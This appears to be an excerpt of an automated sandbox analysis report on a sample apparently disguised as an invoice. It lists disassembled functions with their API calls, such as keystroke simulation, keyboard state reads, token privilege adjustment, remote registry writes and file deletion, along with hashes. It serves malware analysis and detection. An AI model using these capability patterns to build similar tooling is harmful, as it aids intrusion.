                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6E7
                                          • keybd_event.USER32(00000012,00000000), ref: 0043D6F2
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6FC
                                          • keybd_event.USER32(00000012,00000000), ref: 0043D701
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D70A
                                          • keybd_event.USER32(00000012,00000000), ref: 0043D70F
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D719
                                          • keybd_event.USER32(00000012,00000000), ref: 0043D71E
                                          • SetForegroundWindow.USER32(?), ref: 0043D721
                                          • AttachThreadInput.USER32(?,?,00000000), ref: 0043D748
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                          • String ID: Shell_TrayWnd
                                          • API String ID: 4125248594-2988720461
                                          • Opcode ID: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
                                          • Instruction ID: c1ca6a344bcdfaba0e974823023d667c19296b4d148af4653ab9434bf50545cf
                                          • Opcode Fuzzy Hash: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
                                          • Instruction Fuzzy Hash: AE319671A40318BBEB206F619C49F7F7F6CEB48B50F10443AFA04EA1D1D6B45D11ABA9
                                          Function 00458310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                            • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                            • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
                                          • _memset.LIBCMT ref: 00458353
                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004583A5
                                          • CloseHandle.KERNEL32(?), ref: 004583B6
                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004583CD
                                          • GetProcessWindowStation.USER32 ref: 004583E6
                                          • SetProcessWindowStation.USER32(00000000), ref: 004583F0
                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0045840A
                                            • Part of subcall function 004581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
                                            • Part of subcall function 004581CB: CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                          • String ID: $default$winsta0
                                          • API String ID: 2063423040-1027155976
                                          • Opcode ID: 007e003301226a36e1941e8713d92a1d8206d02883a1c24a6694a0b4fadf7aa5
                                          • Instruction ID: 3323b63beeccf06d974511bf231c05544c13643482a2b8641c754c26865e528a
                                          • Opcode Fuzzy Hash: 007e003301226a36e1941e8713d92a1d8206d02883a1c24a6694a0b4fadf7aa5
                                          • Instruction Fuzzy Hash: F3814871900209BFDF119FA5DC45AEE7B78AF08305F14416EFC10B6262EF399A19DB28
                                          Function 0046C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 0046C78D
                                          • FindClose.KERNEL32(00000000), ref: 0046C7E1
                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C806
                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C81D
                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0046C844
                                          • __swprintf.LIBCMT ref: 0046C890
                                          • __swprintf.LIBCMT ref: 0046C8D3
                                            • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                          • __swprintf.LIBCMT ref: 0046C927
                                            • Part of subcall function 00423698: __woutput_l.LIBCMT ref: 004236F1
                                          • __swprintf.LIBCMT ref: 0046C975
                                            • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 00423713
                                            • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 0042372B
                                          • __swprintf.LIBCMT ref: 0046C9C4
                                          • __swprintf.LIBCMT ref: 0046CA13
                                          • __swprintf.LIBCMT ref: 0046CA62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                          • API String ID: 3953360268-2428617273
                                          • Opcode ID: 511509d096d8a85c851f2d3f16a46ec9b1aa2dd11cc0fa5b5634bac435d16de7
                                          • Instruction ID: 7d9c3182f1c50569ad22dcb29b7867164fdd6ce968260aea251e7ba13e5350ae
                                          • Opcode Fuzzy Hash: 511509d096d8a85c851f2d3f16a46ec9b1aa2dd11cc0fa5b5634bac435d16de7
                                          • Instruction Fuzzy Hash: AFA13EB1504304ABC710EFA5C885DAFB7ECFF94708F40492EF585D6192EA38DA08CB66
                                          Function 0046EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0046EFB6
                                          • _wcscmp.LIBCMT ref: 0046EFCB
                                          • _wcscmp.LIBCMT ref: 0046EFE2
                                          • GetFileAttributesW.KERNEL32(?), ref: 0046EFF4
                                          • SetFileAttributesW.KERNEL32(?,?), ref: 0046F00E
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0046F026
                                          • FindClose.KERNEL32(00000000), ref: 0046F031
                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F04D
                                          • _wcscmp.LIBCMT ref: 0046F074
                                          • _wcscmp.LIBCMT ref: 0046F08B
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F09D
                                          • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F0BB
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F0C5
                                          • FindClose.KERNEL32(00000000), ref: 0046F0D2
                                          • FindClose.KERNEL32(00000000), ref: 0046F0E4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                          • String ID: *.*
                                          • API String ID: 1803514871-438819550
                                          • Opcode ID: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
                                          • Instruction ID: e0d4b25dfa95f140917fd6c0b332215adfde449a0ea65fd213ed944f24ec6cf3
                                          • Opcode Fuzzy Hash: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
                                          • Instruction Fuzzy Hash: EC31E7325011187ADF14EFA4EC48AEF77AC9F44360F10057BE844D2191EB79DA88CB6E
                                          Function 00480857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00480953
                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,0048F910,00000000,?,00000000,?,?), ref: 004809C1
                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00480A09
                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00480A92
                                          • RegCloseKey.ADVAPI32(?), ref: 00480DB2
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00480DBF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Close$ConnectCreateRegistryValue
                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                          • API String ID: 536824911-966354055
                                          • Opcode ID: d0f75a01e482a49b07148aa577a98b6e9a5d0e4f819e1f39863cc972e1e4a9db
                                          • Instruction ID: 75f0257f13d9dd97868b06569ad7b6a65722ecc89240c550ead6eefe92fcdcfb
                                          • Opcode Fuzzy Hash: d0f75a01e482a49b07148aa577a98b6e9a5d0e4f819e1f39863cc972e1e4a9db
                                          • Instruction Fuzzy Hash: 3E023A756106119FCB54EF15D841E2AB7E5FF89314F04886EF8899B3A2CB38EC45CB89
                                          Function 004166E1 Relevance: 25.9, Strings: 20, Instructions: 889COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 0DJ$0EJ$0FJ$3cA$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGJ$_A
                                          • API String ID: 0-559809668
                                          • Opcode ID: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
                                          • Instruction ID: 6096d484c95c14ad7aa8192e29e4e3e8d71b99b3f093478e4f466f6acf52d5c9
                                          • Opcode Fuzzy Hash: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
                                          • Instruction Fuzzy Hash: 13727E75E002199BDB14CF59C8807EEB7B5FF48311F15816BE809EB291E7389E85CB98
                                          Function 0046F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0046F113
                                          • _wcscmp.LIBCMT ref: 0046F128
                                          • _wcscmp.LIBCMT ref: 0046F13F
                                            • Part of subcall function 00464385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004643A0
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0046F16E
                                          • FindClose.KERNEL32(00000000), ref: 0046F179
                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F195
                                          • _wcscmp.LIBCMT ref: 0046F1BC
                                          • _wcscmp.LIBCMT ref: 0046F1D3
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F1E5
                                          • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F203
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F20D
                                          • FindClose.KERNEL32(00000000), ref: 0046F21A
                                          • FindClose.KERNEL32(00000000), ref: 0046F22C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                          • String ID: *.*
                                          • API String ID: 1824444939-438819550
                                          • Opcode ID: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
                                          • Instruction ID: 359f8111c83e04d014ff149dee767818393646aa3285bf91305061d844a33625
                                          • Opcode Fuzzy Hash: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
                                          • Instruction Fuzzy Hash: 1031C3365001196ADF10AEA4FC54AEE77AC9F45360F2005BBE844A2190EA39DE89CA6D
                                          Function 0046A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0046A20F
                                          • __swprintf.LIBCMT ref: 0046A231
                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0046A26E
                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0046A293
                                          • _memset.LIBCMT ref: 0046A2B2
                                          • _wcsncpy.LIBCMT ref: 0046A2EE
                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0046A323
                                          • CloseHandle.KERNEL32(00000000), ref: 0046A32E
                                          • RemoveDirectoryW.KERNEL32(?), ref: 0046A337
                                          • CloseHandle.KERNEL32(00000000), ref: 0046A341
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                          • String ID: :$\$\??\%s
                                          • API String ID: 2733774712-3457252023
                                          • Opcode ID: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
                                          • Instruction ID: f10b276181cf8096dd79107661fba1eb4aa855f6953dd7c4d63ebe7d830bec3b
                                          • Opcode Fuzzy Hash: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
                                          • Instruction Fuzzy Hash: 1E31C571500119ABDB20DFA0DC49FEF77BCEF88704F1044BAF908E2260E77496948B29
                                          Function 0046001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetKeyboardState.USER32(?), ref: 00460097
                                          • SetKeyboardState.USER32(?), ref: 00460102
                                          • GetAsyncKeyState.USER32(000000A0), ref: 00460122
                                          • GetKeyState.USER32(000000A0), ref: 00460139
                                          • GetAsyncKeyState.USER32(000000A1), ref: 00460168
                                          • GetKeyState.USER32(000000A1), ref: 00460179
                                          • GetAsyncKeyState.USER32(00000011), ref: 004601A5
                                          • GetKeyState.USER32(00000011), ref: 004601B3
                                          • GetAsyncKeyState.USER32(00000012), ref: 004601DC
                                          • GetKeyState.USER32(00000012), ref: 004601EA
                                          • GetAsyncKeyState.USER32(0000005B), ref: 00460213
                                          • GetKeyState.USER32(0000005B), ref: 00460221
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: State$Async$Keyboard
                                          • String ID:
                                          • API String ID: 541375521-0
                                          • Opcode ID: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
                                          • Instruction ID: c6705f0abb03acfe1c66d12a8beead0d319d3067caf51b1e954f1b2a293a3a50
                                          • Opcode Fuzzy Hash: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
                                          • Instruction Fuzzy Hash: 7F51BC2090478829FB35D7A098547EBBFB49F12380F08459F99C2566C3FA5C9A8CC75B
                                          Function 004803DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004804AC
                                            • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                            • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0048054B
                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004805E3
                                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00480822
                                          • RegCloseKey.ADVAPI32(00000000), ref: 0048082F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                          • String ID:
                                          • API String ID: 1240663315-0
                                          • Opcode ID: eabf8d680dfe3cfd2204718e86051aa88e9542fed0f6c3d8dda5e7a0bc609bf0
                                          • Instruction ID: efbac3d2c4afa975f371ae5d5fee671ec22ce1fa5a9a6cb729be810612663562
                                          • Opcode Fuzzy Hash: eabf8d680dfe3cfd2204718e86051aa88e9542fed0f6c3d8dda5e7a0bc609bf0
                                          • Instruction Fuzzy Hash: A5E16E71614200AFCB54EF25C891D2FBBE4EF89314B04896EF84ADB3A2D634ED45CB56
                                          Function 00474164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                          • String ID:
                                          • API String ID: 1737998785-0
                                          • Opcode ID: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
                                          • Instruction ID: 6a8dd1f95291b63ae5b16d2a5a0d869dcb5166510358231783c1e180ef80644f
                                          • Opcode Fuzzy Hash: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
                                          • Instruction Fuzzy Hash: CE2191352002109FDB00AF54EC09B6E7BA8EF44751F10847AF945E72A2EB38AC05CB5D
                                          Function 004637EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                                            • Part of subcall function 00464A31: GetFileAttributesW.KERNEL32(?,0046370B), ref: 00464A32
                                          • FindFirstFileW.KERNEL32(?,?), ref: 004638A3
                                          • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0046394B
                                          • MoveFileW.KERNEL32(?,?), ref: 0046395E
                                          • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0046397B
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046399D
                                          • FindClose.KERNEL32(00000000,?,?,?,?), ref: 004639B9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                          • String ID: \*.*
                                          • API String ID: 4002782344-1173974218
                                          • Opcode ID: e41a741f13836c122e1a93b35399af2899a1ae988daff58317c02930b9991c4e
                                          • Instruction ID: 5f3270bf9419f81a9c4f0e0ab399985bb250d256c3569b2459e2ec67edc6ab47
